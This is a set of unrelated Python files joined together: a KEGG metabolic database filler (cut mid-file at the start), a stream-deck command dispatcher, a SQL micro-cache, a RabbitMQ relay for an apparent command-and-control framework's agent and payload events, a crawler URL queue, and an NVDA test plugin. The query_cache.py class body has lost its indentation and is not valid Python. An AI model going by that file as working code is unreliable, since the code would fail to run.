            compounds.append((cpd+cytosol,
                              self.compoundinfo.get(cpd, 'None'),
                              compartment,
                              keggid,
                              self.inchi_cf.get(cpd, 'None'),
                              self.inchi_cas.get(cpd, 'None')))
        self.cnx.executemany("INSERT INTO compound VALUES (?,?,?,?,?,?)", compounds)
        self.conn.commit()

    def fill_new_database(self):
        """Fill a freshly created database with the downloaded KEGG data."""
        cytosol = '_c0'  # compartment suffix appended to every ID
        self.cnx.execute("INSERT INTO compartments VALUES (?,?)", ('c0', 'cytosol'))
        self.cnx.execute("INSERT INTO compartments VALUES (?,?)", ('e0', 'extracellular'))
        for orgID in self.orgIDs:
            self.cnx.execute("INSERT INTO model VALUES (?,?)", (orgID, self.orgIDs[orgID]+'_KEGG'))
        self.cnx.commit()
        for key, orgIDs in self.metabolic_clusters.iteritems():
            for orgID in orgIDs:
                self.cnx.execute("INSERT INTO cluster VALUES (?,?)", (key, orgID))
        self.cnx.commit()
        for orgID, reactions in self.reactionIDs.iteritems():
            cpds_all = set()
            for reaction in reactions:
                reaction_cm = reaction+cytosol
                self.cnx.execute("INSERT INTO reaction_protein VALUES (?,?,?)",
                                 (reaction_cm, orgID, self.reactioninfo[reaction]['enzyme']))
                self.cnx.execute("INSERT INTO reaction_gene VALUES (?,?,?)",
                                 (reaction_cm, orgID, 'None'))
                self.cnx.execute("INSERT INTO model_reaction VALUES (?,?,?)",
                                 (reaction_cm, orgID, self.reactioninfo[reaction]['reversible']))
                cpds_all.update(self.reactioninfo[reaction]['reactants'])
                cpds_all.update(self.reactioninfo[reaction]['products'])
            for cpd in cpds_all:
                self.cnx.execute("INSERT INTO model_compound VALUES (?,?)", (cpd+cytosol, orgID))
        self.cnx.commit()
        all_cpds_to_add = set()
        for reaction in self.reactioninfo:
            reaction_cm = reaction+cytosol
            self.cnx.execute("INSERT INTO reaction_reversibility VALUES (?,?)",
                             (reaction_cm, self.reactioninfo[reaction]['reversible']))
            self.cnx.execute("INSERT INTO reaction VALUES (?,?,?,?)",
                             (reaction_cm, self.reactioninfo[reaction]['name'], reaction, self.rxntype))
            for reactant in self.reactioninfo[reaction]['reactants']:
                self.cnx.execute("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
                                 (reaction_cm, reactant+cytosol, 0,
                                  self.reactioninfo[reaction]['reactants'][reactant], 0))
                all_cpds_to_add.add(reactant)
            for product in self.reactioninfo[reaction]['products']:
                self.cnx.execute("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
                                 (reaction_cm, product+cytosol, 1,
                                  self.reactioninfo[reaction]['products'][product], 0))
                all_cpds_to_add.add(product)
        self.cnx.commit()
        if self.inchidb:
            for inchi in self.cpd2inchi:
                self.cnx.execute("INSERT INTO original_db_cpdIDs VALUES (?,?)",
                                 (self.cpd2inchi[inchi]+cytosol, inchi+cytosol))
            self.cnx.commit()
        for cpd in all_cpds_to_add:
            # Bug fix: the parameter tuple used to be closed right after ``cpd``,
            # so only 4 of the 6 placeholders were bound and the formula/CAS
            # values were passed as stray positional arguments to execute()
            # (TypeError at runtime).  compoundinfo lookup now falls back to
            # 'None' like add_to_preexisting_db does.
            self.cnx.execute("""INSERT INTO compound VALUES (?,?,?,?,?,?)""",
                             (cpd+cytosol, self.compoundinfo.get(cpd, 'None'), 'c0', cpd,
                              self.inchi_cf.get(cpd, 'None'), self.inchi_cas.get(cpd, 'None')))
        # Commit before reconnecting through Q.Connector, otherwise the new
        # connection cannot see the uncommitted compound rows.
        self.cnx.commit()
        self.DB = Q.Connector(self.database)
|
OpenStreamDeck.py | """OpenStreamDeck"""
from threading import Thread
from interfaces import Interface
import time
class OpenStreamDeck():
    """Read commands from an Interface and dispatch them to components by id.

    Commands are whitespace-separated strings of the form
    ``"<component_id> <event>"``; the literal command ``"exit"`` stops the
    reader thread.
    """

    def __init__(self, interface: Interface, components: list) -> None:
        """
        :param interface: input source whose ``read()`` yields command strings
        :param components: objects exposing an ``id`` attribute and a
                           ``trigger(event=...)`` method
        """
        self.interface = interface
        self.run_thread = Thread(target=self._run, args=(), daemon=True)
        self.components = {}
        # Reuse the indexing helper instead of duplicating its loop here
        # (the two were previously verbatim copies).
        self._init_components(components)

    def _init_components(self, components: list):
        """Index components by their id for O(1) command dispatch."""
        for component in components:
            self.components[component.id] = component

    def start(self):
        """Start the reader thread and block until it terminates."""
        self.run_thread.do_run = True
        self.run_thread.start()
        # Bug fix: this used to loop forever, so the process never exited even
        # after the 'exit' command stopped the reader thread.
        while self.run_thread.is_alive():
            time.sleep(0.1)

    def _run(self):
        """Poll the interface and dispatch '<component_id> <event>' commands."""
        while getattr(self.run_thread, "do_run", True):
            data = self.interface.read()
            try:
                if data:
                    if data == 'exit':
                        self.run_thread.do_run = False
                        # exit() raises SystemExit, ending only this thread.
                        exit()
                    command = data.split(' ')
                    if command[0] in self.components:
                        self.components[command[0]].trigger(event=command[1])
                    print(data)
                time.sleep(0.1)
            except IndexError:
                # Command without an event part, e.g. "button1".
                print("Invalid command...")
|
query_cache.py | import threading
import time
# Define a query cache.
# ==========================
class Entry:
    """One record in a QueryCache: the cached result plus its bookkeeping."""

    timestamp = None  # when the query was last run [datetime.datetime]
    lock = None       # per-entry access control [threading.Lock]
    exc = None        # exception raised during query/formatting, if any

    def __init__(self, timestamp=0, lock=None, result=None):
        """Create a dummy placeholder entry or wrap an actual db result."""
        self.timestamp = timestamp
        if not lock:
            lock = threading.Lock()
        self.lock = lock
        self.result = result
class QueryCache:
"""Implement a caching SQL post-processor.
Instances of this object are callables that take two or more arguments. The
first argument is a callback function; subsequent arguments are strings of
SQL. The callback function will be given one result set per SQL query, and
in the same order. These result sets are lists of dictionaries. The
callback function may return any Python data type; this is the query
result, post-processed for your application.
The results of the callback are cached for <self.threshold> seconds
(default: 5), keyed to the given SQL queries. NB: the cache is *not* keyed
to the callback function, so cache entries with different callbacks will
collide when operating on identical SQL queries. In this case cache entries
can be differentiated by adding comments to the SQL statements.
This so-called micro-caching helps greatly when under load, while keeping
pages more or less fresh. For relatively static page elements like
navigation, the time could certainly be extended. But even for page
elements which are supposed to seem completely dynamic -- different for
each page load -- you can profitably use this object with a low cache
setting (1 or 2 seconds): the page will appear dynamic to any given user,
but 100 requests in the same second will only result in one database call.
This object also features a pruning thread, which removes stale cache
entries on a more relaxed schedule (default: 60 seconds). It keeps the
cache clean without interfering too much with actual usage.
If the actual database call or the formatting callback raise an Exception,
then that is cached as well, and will be raised on further calls until the
cache expires as usual.
And yes, Virginia, QueryCache is thread-safe (as long as you don't invoke
the same instance again within your formatting callback).
"""
db = None # PostgresManager object
cache = None # the query cache [dictionary]
locks = None # access controls for self.cache [Locks]
threshold = 5 # maximum life of a cache entry [seconds as int]
threshold_prune = 60 # time between pruning runs [seconds as int]
def __init__(self, db, threshold=5, threshold_prune=60):
    """Set up the cache and start its background pruning thread.

    db -- database manager exposing one()/all() (e.g. PostgresManager)
    threshold -- maximum life of a cache entry, in seconds
    threshold_prune -- seconds between pruning runs
    """
    self.db = db
    self.threshold = threshold
    self.threshold_prune = threshold_prune
    self.cache = {}

    # Two coarse locks: 'checkout' guards reads of self.cache,
    # 'checkin' guards writes. Individual entries carry their own lock.
    class Locks:
        checkin = threading.Lock()
        checkout = threading.Lock()
    self.locks = Locks()

    self.pruner = threading.Thread(target=self.prune)
    # Daemon so the pruner never keeps the process alive on shutdown.
    # (.daemon replaces the deprecated setDaemon() call.)
    self.pruner.daemon = True
    self.pruner.start()
def one(self, query, params=None, process=None):
    """Run *query* expecting a single row, served through the micro-cache."""
    fetch = self.db.one
    return self._do_query(fetch, query, params, process)
def all(self, query, params=None, process=None):
    """Run *query* expecting any number of rows, served through the micro-cache."""
    fetch = self.db.all
    return self._do_query(fetch, query, params, process)
def _do_query(self, fetchfunc, query, params, process):
    """Execute *query* through the micro-cache.

    fetchfunc -- bound database method (self.db.one or self.db.all)
    query -- SQL string; part of the cache key
    params -- bind parameters; part of the cache key
    process -- optional callback applied to the raw result set

    Returns the (possibly processed) result, served from cache while the
    entry is younger than self.threshold. A cached exception is re-raised
    on every call until the entry expires.
    """

    # Compute a cache key.
    # ====================

    key = (query, params)

    # Check out an entry.
    # ===================
    # Each entry has its own lock, and "checking out" an entry means
    # acquiring that lock. If a queryset isn't yet in our cache, we first
    # "check in" a new dummy entry for it (and prevent other threads from
    # adding the same query), which will be populated presently.

    self.locks.checkout.acquire()
    try:  # critical section
        if key in self.cache:

            # Retrieve an already cached query.
            # =================================
            # The cached entry may be a dummy. The best way to guarantee we
            # will catch this case is to simply refresh our entry after we
            # acquire its lock.

            entry = self.cache[key]
            entry.lock.acquire()
            entry = self.cache[key]
        else:

            # Add a new entry to our cache.
            # =============================
            # The dummy's lock is taken *before* it becomes visible, so any
            # other thread finding it will block until we have populated it.

            dummy = Entry()
            dummy.lock.acquire()
            self.locks.checkin.acquire()
            try:  # critical section
                if key in self.cache:
                    # Someone beat us to it. XXX: can this actually happen?
                    entry = self.cache[key]
                else:
                    self.cache[key] = dummy
                    entry = dummy
            finally:
                self.locks.checkin.release()
    finally:
        # Now that we've checked out our queryset, other threads are free
        # to check out other queries.
        self.locks.checkout.release()

    # Process the query.
    # ==================

    try:  # critical section -- we hold entry.lock from here on
        # Decide whether it's a hit or miss.
        # ==================================
        if time.time() - entry.timestamp < self.threshold:  # cache hit
            if entry.exc is not None:
                raise entry.exc
            return entry.result
        else:  # cache miss
            try:
                entry.result = fetchfunc(query, params)
                if process is not None:
                    entry.result = process(entry.result)
                entry.exc = None
            except Exception as exc:
                # Cache the failure too, so a failing query doesn't hammer
                # the database until the entry expires.
                entry.result = None
                entry.exc = exc

            # Check the queryset back in.
            # ===========================
            self.locks.checkin.acquire()
            try:  # critical section
                entry.timestamp = time.time()
                self.cache[key] = entry
                if entry.exc is not None:
                    raise entry.exc
                else:
                    return entry.result
            finally:
                self.locks.checkin.release()
    finally:
        entry.lock.release()
def prune(self):
    """Daemon loop: periodically evict stale entries from the cache."""
    last_run = 0  # timestamp of the previous pruning pass
    while True:
        # Sleep in short slices until the next scheduled pass.
        if time.time() < last_run + self.threshold_prune:
            time.sleep(0.2)
            continue
        self.locks.checkout.acquire()
        try:  # critical section
            for key, entry in list(self.cache.items()):
                # Try to check the entry out without blocking; a busy
                # entry is simply skipped until the next pass.
                if not entry.lock.acquire(False):
                    continue
                try:  # critical section
                    # Drop entries that have outlived the prune window.
                    if time.time() - entry.timestamp > self.threshold_prune:
                        del self.cache[key]
                finally:
                    entry.lock.release()
        finally:
            self.locks.checkout.release()
        last_run = time.time()
|
rabbitmq.py | import pika
from time import sleep
import json
import amqpstorm
from amqpstorm import Message
from config import RABBIT_HOST, RABBIT_USERNAME, RABBIT_PASSWORD
from logger import log
class Consumer(object):
    """Asynchronous Rpc client.

    Consumes Core-exchange events from RabbitMQ and forwards them to web
    clients through ``self.socketio`` (which must be assigned by the
    application after construction). Replies to RPC requests issued by the
    Producer are collected in ``self.queue``, keyed by correlation id.
    """

    def __init__(self):
        log('rabbitmq-consumer:init', 'Creating client..')
        self.queue = {}  # correlation_id -> reply body (None until answered)
        self.host = RABBIT_HOST
        self.username = RABBIT_USERNAME
        self.password = RABBIT_PASSWORD
        self.channel = None
        self.connection = None
        self.callback_queue = None
        self.rpc_queue = 'ApiService'
        self.socketio = None  # NOTE: set externally before events arrive
        self.open()

    def open(self):
        """Block until RabbitMQ is reachable, then declare and bind queues.

        Returns self so the call can be chained.
        """
        rabbit_connected = False
        log('rabbitmq-consumer:open', 'Opening Connection..')
        log("rabbitmq-consumer:open", "Checking RabbitMQ..")
        # Probe with a short-lived pika connection until the broker is up.
        while not rabbit_connected:
            try:
                credentials = pika.PlainCredentials(self.username, self.password)
                connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
                                                                               credentials=credentials,
                                                                               socket_timeout=2,
                                                                               blocked_connection_timeout=2))
                rabbit_connected = True
                log("rabbitmq-consumer:open", "RabbitMQ is up!")
                connection.close()
            except Exception as e:
                rabbit_connected = False
                log("rabbitmq-consumer:open", f"Connection Error: {str(e)}")
                log("rabbitmq-consumer:open", "RabbitMQ not reachable.. waiting..")
                sleep(2)

        # The long-lived connection/channel are amqpstorm, not pika.
        self.connection = amqpstorm.Connection(self.host, self.username,
                                               self.password)
        self.channel = self.connection.channel()

        # Create the exchange
        self.exchange = amqpstorm.channel.Exchange(self.channel)
        self.exchange.declare(exchange='Core',
                              exchange_type='topic',
                              durable=True)

        # Create the APIService queue and bind it to every Core event type
        # we forward to clients.
        log('rabbitmq-consumer:open', 'Creating queue: {0}'.format(self.rpc_queue))
        self.channel.queue.declare(self.rpc_queue, durable=True, exclusive=False, auto_delete=False, arguments=None)
        routing_keys = (
            'AgentCheckinAnnouncement',
            'AgentCommandsUpdated',
            'AgentTaskUpdate',
            'AgentUpdated',
            'ConsoleMessageAnnouncement',
            'DevPayloadCreated',
            'ErrorMessageAnnouncement',
            'NewFactionFile',
            'NewAgent',
            'PayloadCreated',
            'PayloadUpdated',
            'TransportCreated',
            'TransportUpdated',
        )
        for routing_key in routing_keys:
            self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key=routing_key)
        self.channel.basic.consume(self._on_response, no_ack=True, queue=self.rpc_queue)

        # Create Callback queue (broker-named, exclusive) for RPC replies.
        result = self.channel.queue.declare(exclusive=True)
        log("rabbitmq-consumer:open", "Creating callback queue: {}".format(result['queue']))
        self.callback_queue = result['queue']
        self.channel.basic.consume(self._on_response, no_ack=True,
                                   queue=self.callback_queue)
        return self

    def update_queue(self, message_id):
        """Register interest in an RPC reply for *message_id*."""
        log("rabbitmq-consumer:update_queue", "Adding message id: {}".format(message_id))
        self.queue[message_id] = None

    def process_data_events(self):
        """Process Data Events using the Process Thread. Blocks forever."""
        log("rabbitmq-consumer:_process_data_events", "Consuming..")
        self.channel.start_consuming()

    def _on_response(self, message):
        """On Response store the message with the correlation id in a local
        dictionary, or forward a Core event to the socketio clients.
        """
        # TODO: This could be more nuanced, but who has time for that.
        try:
            log('rabbitmq-consumer:_on_response', 'Message Properties: {0}'.format(json.dumps(message.properties)))
            log('rabbitmq-consumer:_on_response', 'Message Body: {0}'.format(message.body))
            if message.correlation_id in self.queue:
                log('rabbitmq-consumer:_on_response', 'Got a response to one of our messages. Updating queue.')
                self.queue[message.correlation_id] = message.body
            # AGENT CHECKIN ANNOUNCEMENT
            elif message.properties['message_type'] == 'AgentCheckinAnnouncement':
                log("rabbitmq-consumer:_on_response", "Got AgentCheckinAnnouncement at {0}".format(message.timestamp))
                agentCheckin = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentCheckin)))
                self.socketio.emit('agentCheckin', agentCheckin)
            # AGENT COMMANDS UPDATED
            elif message.properties['message_type'] == 'AgentCommandsUpdated':
                log("rabbitmq-consumer:_on_response", "Got AgentCommandsUpdated at {0}".format(message.timestamp))
                agentCommandsUpdated = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentCommandsUpdated)))
                self.socketio.emit('agentCommandsUpdated', agentCommandsUpdated, room=agentCommandsUpdated["AgentId"])
            # AGENT UPDATED
            elif message.properties['message_type'] == 'AgentUpdated':
                log("rabbitmq-consumer:_on_response", "Got AgentUpdated at {0}".format(message.timestamp))
                agentUpdated = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentUpdated)))
                self.socketio.emit('agentUpdated', agentUpdated)
            # CONSOLE MESSAGE ANNOUNCEMENT
            elif message.properties['message_type'] == 'ConsoleMessageAnnouncement':
                log("rabbitmq-consumer:_on_response", "Got ConsoleMessageAnnouncement")
                # Parse into a new name instead of rebinding `message`, which
                # names the AMQP message object everywhere else in this method.
                body = json.loads(message.body)
                consoleMessage = body['ConsoleMessage']
                consoleMessage['Username'] = body['Username']
                # Content may be large; clients fetch it on demand.
                consoleMessage.pop('Content', None)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(consoleMessage)))
                self.socketio.emit('consoleMessageAnnouncement', consoleMessage, room=consoleMessage["AgentId"])
            # DEV PAYLOAD CREATED
            elif message.properties['message_type'] == 'DevPayloadCreated':
                log("rabbitmq-consumer:_on_response", "Got DevPayloadCreated at {0}".format(message.timestamp))
                devPayloadComplete = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(devPayloadComplete)))
                self.socketio.emit('devPayloadCreated', devPayloadComplete)
            # ERROR MESSAGE ANNOUNCEMENT
            elif message.properties['message_type'] == 'ErrorMessageAnnouncement':
                log("rabbitmq-consumer:_on_response", "Got ErrorMessageAnnouncement at {0}".format(message.timestamp))
                errorMessageAnnouncement = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(errorMessageAnnouncement)))
                # TL;DR - We only broadcast errors if they didn't come from API
                # I *think* this is the right way to go about this. API errors shouldn't typically be of interest to
                # everyone using Faction and the API is going to reply back with the error message when it encounters
                # it.
                if errorMessageAnnouncement['Source'] != 'API':
                    self.socketio.emit('errorMessageAnnouncement', errorMessageAnnouncement)
                else:
                    self.socketio.emit('errorMessageAnnouncement', errorMessageAnnouncement, broadcast=True)
            # NEW FACTION FILE
            elif message.properties['message_type'] == 'NewFactionFile':
                log("rabbitmq-consumer:_on_response", "Got NewFactionFile")
                fileMessage = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
                self.socketio.emit('newFile', fileMessage)
            # NEW AGENT
            elif message.properties['message_type'] == 'NewAgent':
                log("rabbitmq-consumer:_on_response", "Got NewAgent at {0}".format(message.timestamp))
                agent = json.loads(message.body)
                agent['Success'] = True
                log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agent)))
                self.socketio.emit('newAgent', agent, broadcast=True)
            # PAYLOAD CREATED
            elif message.properties['message_type'] == 'PayloadCreated':
                log("rabbitmq-consumer:_on_response", "Got PayloadCreated")
                payloadMessage = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
                self.socketio.emit('payloadCreated', payloadMessage)
            # PAYLOAD UPDATED
            elif message.properties['message_type'] == 'PayloadUpdated':
                log("rabbitmq-consumer:_on_response", "Got PayloadUpdate")
                payloadUpdateMessage = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
                self.socketio.emit('payloadUpdated', payloadUpdateMessage)
            # TRANSPORT CREATED
            elif message.properties['message_type'] == 'TransportCreated':
                log("rabbitmq-consumer:_on_response", "Got TransportCreated")
                transportMessage = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
                self.socketio.emit('transportCreated', transportMessage)
            # TRANSPORT UPDATED
            elif message.properties['message_type'] == 'TransportUpdated':
                log("rabbitmq-consumer:_on_response", "Got TransportUpdated")
                transportMessage = json.loads(message.body)
                log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
                self.socketio.emit('transportUpdated', transportMessage)
            # AGENT TASKUPDATE
            # TODO: Why aren't we doing anything with this?
            elif message.properties['message_type'] == 'AgentTaskUpdate':
                log("rabbitmq-consumer:_on_response", "Got AgentTaskUpdate")
            # NOTE: a second AgentCheckinAnnouncement branch used to sit here;
            # it was unreachable because the type is fully handled above.
        except Exception as e:
            log("rabbitmq-consumer:_on_response", "ERROR PROCESSING RABBITMQ MESSAGE: {0}".format(e))
rabbit_consumer = Consumer()
class Producer(object):
    """Asynchronous Rpc client.

    Publishes messages to the Core exchange over the shared
    ``rabbit_consumer`` channel; replies (when requested) are routed to
    that consumer's callback queue.
    """

    def __init__(self):
        log("rabbitmq-producer:open", "Creating client..")
        self.queue = {}
        self.host = RABBIT_HOST
        self.username = RABBIT_USERNAME
        self.password = RABBIT_PASSWORD
        self.channel = None
        self.connection = None
        self.rpc_queue = 'ApiService'
        self.callback_queue = None
        self.open()

    def open(self):
        """Block until RabbitMQ answers a probe connection; returns self."""
        rabbit_connected = False
        log("rabbitmq-producer:open", "Opening Connection..")
        log("rabbitmq-producer:open", "Checking RabbitMQ..")
        while not rabbit_connected:
            try:
                credentials = pika.PlainCredentials(self.username, self.password)
                connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
                                                                               credentials=credentials,
                                                                               socket_timeout=2,
                                                                               blocked_connection_timeout=2))
                rabbit_connected = True
                log("rabbitmq-producer:open", "RabbitMQ is up!")
                connection.close()
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # can still break the retry loop; log the cause like Consumer does.
            except Exception as e:
                rabbit_connected = False
                log("rabbitmq-producer:open", f"Connection Error: {str(e)}")
                log("rabbitmq-producer:open", "RabbitMQ not reachable.. waiting..")
                sleep(2)
        return self

    def send_request(self, routing_key, message, callback=False):
        """Publish *message* (JSON-serialised) to the Core exchange.

        routing_key -- Core routing key; also stored as the message_type property
        callback -- when True, direct the reply to the consumer's callback
                    queue and pre-register the correlation id there.
        Returns the correlation id that identifies this request.
        """
        # Create the Message object.
        log("rabbitmq-producer:send_request", "Got message: {0} with routing_key: {1}".format(message, routing_key))
        message = Message.create(rabbit_consumer.channel, json.dumps(message))
        if callback:
            message.reply_to = rabbit_consumer.callback_queue
            # Create an entry in our local dictionary, using the automatically
            # generated correlation_id as our key.
            rabbit_consumer.update_queue(message.correlation_id)
        message.properties['message_type'] = routing_key
        # Publish the RPC request.
        log("rabbitmq-producer:send_request", "Publishing message..")
        message.publish(routing_key=routing_key, exchange='Core')
        # Return the Unique ID used to identify the request.
        log("rabbitmq-producer:send_request", "Got correlation_id: {0}".format(str(message.correlation_id)))
        return message.correlation_id
rabbit_producer = Producer()
|
database.py | import pymysql, re, time
from threading import Thread
from colorama import init, Fore, Style
from urllib.parse import quote, unquote
from sys import exit
class Database(object):
    """MySQL-backed URL queue for the crawler.

    Wraps a pymysql connection and exposes queue operations (fetch,
    enqueue, mark-visited). SQL parameters are passed to the driver for
    escaping instead of being interpolated into the statement text.
    """

    def __init__(self, user, password, database, host='127.0.0.1', port=3306):
        """Connect to MySQL; on failure report error code 0x1 and exit."""
        try:
            init()  # colorama, so ANSI colours also work on Windows
            self.db = pymysql.connect(
                host=host,
                port=port,
                user=user,
                password=password,
                db=database
            )
            self.cursor = self.db.cursor()
        except Exception as e:
            Database.error(e, '0x1')
            exit()

    @staticmethod
    def error(err, err_code):
        """Print a colour-coded database error to stdout."""
        print(Fore.RED + 'BETA database error %s:%s' % (err_code, err, ))
        print(Style.RESET_ALL)

    def get_queue(self, num_links=10):
        """Return up to *num_links* unvisited URLs, unquoted, and mark them visited."""
        # Parameterized query: the driver interpolates %s values safely.
        self.execute("SELECT url FROM queue WHERE visited = '0' LIMIT %s;", (int(num_links),))
        result = self.cursor.fetchall()
        response = []
        # Mark the fetched rows as visited before handing them out.
        self.remove(result)
        for i in range(len(result)):
            response.append(unquote(result[i][0]))
            response[i] = re.sub(r'(\\)*$', '', response[i])
        return response

    def write_to_db(self, url):
        """Insert *url* into the queue; duplicate entries are silently skipped."""
        try:
            self.execute(
                "INSERT INTO queue (url, visited, unixtime) VALUES (%s, 0, %s);",
                (self.escape_url(url), int(time.time())),
            )
            print(Fore.GREEN + 'Added', url, 'to queue.')
            print(Style.RESET_ALL)
        except Exception as e:
            # Error 1062 is MySQL's duplicate-key error: the URL is already queued.
            if not '(1062, "Duplicate entry ' in str(e):
                Database.error(e, '0x2')

    def set_queue(self, urls):
        """Enqueue each URL on its own daemon thread; returns True."""
        for url in urls:
            # BUGFIX: pass the callable and args separately; previously
            # `target=self.write_to_db(url)` ran the insert synchronously
            # and handed Thread a None target.
            t = Thread(target=self.write_to_db, args=(url,))
            t.daemon = True
            t.start()
        return True

    def escape_url(self, url):
        """Strip any trailing backslashes from *url*."""
        return re.sub(r'(\\)*$', '', url)

    def update_queue(self, url):
        """Mark *url* as visited with the current timestamp."""
        try:
            self.execute(
                "UPDATE queue SET visited=1, unixtime=%s WHERE url = %s;",
                (int(time.time()), self.escape_url(url)),
            )
        except Exception as e:
            Database.error(e, '0x3')

    def remove(self, urls):
        """Mark each fetched row's URL as visited, one daemon thread each."""
        for line in urls:
            url = line[0]
            # BUGFIX: same target/args separation as set_queue.
            t = Thread(target=self.update_queue, args=(url,))
            t.daemon = True
            t.start()

    def execute(self, command, args=None):
        """Run *command* (optionally with driver-escaped *args*) and commit.

        The *args* parameter is new but optional, so existing callers that
        pass a fully formed statement keep working.
        """
        self.cursor.execute(command, args)
        self.db.commit()

    def close(self):
        """Close the underlying connection."""
        self.db.close()
|
speechSpyGlobalPlugin.py | # A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import typing
from typing import Optional
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
    """Import RobotRemoteServer from the plugin's bundled 'libs' directory.

    robotremoteserver is not distributed with an install of NVDA, so the
    copy shipped alongside this plugin package is put on sys.path first.
    """
    log.debug(f"before path mod: {sys.path}")
    # Get the path to the top of the package
    TOP_DIR = os.path.abspath(os.path.dirname(__file__))
    # imports that require libraries not distributed with an install of NVDA
    libsDir = os.path.join(TOP_DIR, "libs")
    # Guard so repeated calls don't keep growing sys.path.
    if libsDir not in sys.path:
        sys.path.append(libsDir)
    log.debug(f"after path mod: {sys.path}")
    from robotremoteserver import RobotRemoteServer
    return RobotRemoteServer
class NVDASpyLib:
    """ Robot Framework Library to spy on NVDA during system tests.
    Used to determine if NVDA has finished starting, and various ways of getting speech output.
    All public methods are part of the Robot Library
    """
    # Silence for this long is treated as "speech has finished".
    SPEECH_HAS_FINISHED_SECONDS: float = 0.5

    def __init__(self):
        # speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
        self._nvdaSpeech_requiresLock = [  # requires thread locking before read/write
            [""],  # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
        ]
        self._lastSpeechTime_requiresLock = _timer()
        #: Lock to protect members written in _onNvdaSpeech.
        self._speechLock = threading.RLock()
        self._isNvdaStartupComplete = False
        self._allSpeechStartIndex = self.get_last_speech_index()
        # Overridden by init_max_keyword_duration() once the Remote library is set up.
        self._maxKeywordDuration = 30
        self._registerWithExtensionPoints()

    def _registerWithExtensionPoints(self):
        from core import postNvdaStartup
        postNvdaStartup.register(self._onNvdaStartupComplete)
        # This file (`speechSpyGlobalPlugin.py`) is moved to
        # "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
        # Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
        from synthDrivers.speechSpySynthDriver import post_speech
        post_speech.register(self._onNvdaSpeech)

    # callbacks for extension points
    def _onNvdaStartupComplete(self):
        self._isNvdaStartupComplete = True

    def _onNvdaSpeech(self, speechSequence=None):
        if not speechSequence:
            return
        with self._speechLock:
            self._lastSpeechTime_requiresLock = _timer()
            self._nvdaSpeech_requiresLock.append(speechSequence)

    @staticmethod
    def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
        # Only the str members contribute; speech commands (pitch, breaks,
        # etc.) are dropped.
        baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
        return ''.join(baseStrings).strip()

    def _getSpeechAtIndex(self, speechIndex):
        with self._speechLock:
            return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])

    def get_speech_at_index_until_now(self, speechIndex: int) -> str:
        """ All speech from (and including) the index until now.
        @param speechIndex:
        @return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
        """
        with self._speechLock:
            speechCommands = [
                self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
            ]
            return "\n".join(x for x in speechCommands if x and not x.isspace())

    def get_last_speech_index(self) -> int:
        with self._speechLock:
            return len(self._nvdaSpeech_requiresLock) - 1

    def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
        """Index of the first cached utterance containing *speech* (substring
        match), searching after *searchAfterIndex*; -1 when not found.
        """
        if searchAfterIndex is None:
            firstIndexToCheck = 0
        else:
            firstIndexToCheck = 1 + searchAfterIndex
        with self._speechLock:
            for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
                index = index + firstIndexToCheck
                baseStrings = [c.strip() for c in commands if isinstance(c, str)]
                if any(speech in x for x in baseStrings):
                    return index
            return -1

    def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
        with self._speechLock:
            # "started": either we don't care which utterance, or the given
            # index already exists in the cache.
            started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
            finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
            return started and finished

    def _devInfoToLog(self):
        import api
        obj = api.getNavigatorObject()
        if hasattr(obj, "devInfo"):
            log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
        else:
            log.info("No developer info for navigator object")

    def dump_speech_to_log(self):
        log.debug("dump_speech_to_log.")
        with self._speechLock:
            try:
                self._devInfoToLog()
            except Exception:
                log.error("Unable to log dev info")
            try:
                log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
            except Exception:
                log.error("Unable to log speech")

    def _minTimeout(self, timeout: float) -> float:
        """Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
        return min(timeout, self._maxKeywordDuration)

